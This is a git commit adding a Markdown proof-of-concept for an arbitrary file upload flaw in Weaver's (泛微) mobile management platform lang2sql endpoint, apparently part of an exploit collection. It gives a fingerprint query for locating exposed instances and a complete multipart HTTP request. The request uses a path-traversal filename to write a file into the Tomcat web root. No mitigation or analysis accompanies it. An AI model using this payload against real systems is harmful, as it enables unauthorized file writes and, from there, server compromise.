Create 泛微移动管理平台lang2sql接口任意文件上传.md
This commit is contained in:
parent
abe7c0201b
commit
8c4448520a
28
泛微移动管理平台lang2sql接口任意文件上传.md
Normal file
28
泛微移动管理平台lang2sql接口任意文件上传.md
Normal file
@ -0,0 +1,28 @@
|
||||
## 泛微移动管理平台lang2sql接口任意文件上传
|
||||
|
||||
##
|
||||
```
|
||||
web.title="移动管理平台"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
|
||||
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Host: 目标地址
|
||||
Content-Length: 202
|
||||
Expect: 100-continue
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundarymVk33liI64J7GQaK
|
||||
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/9SIpL.txt"
|
||||
|
||||
b9Q2Itmn1
|
||||
------WebKitFormBoundarymVk33liI64J7GQaK--
|
||||
```
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user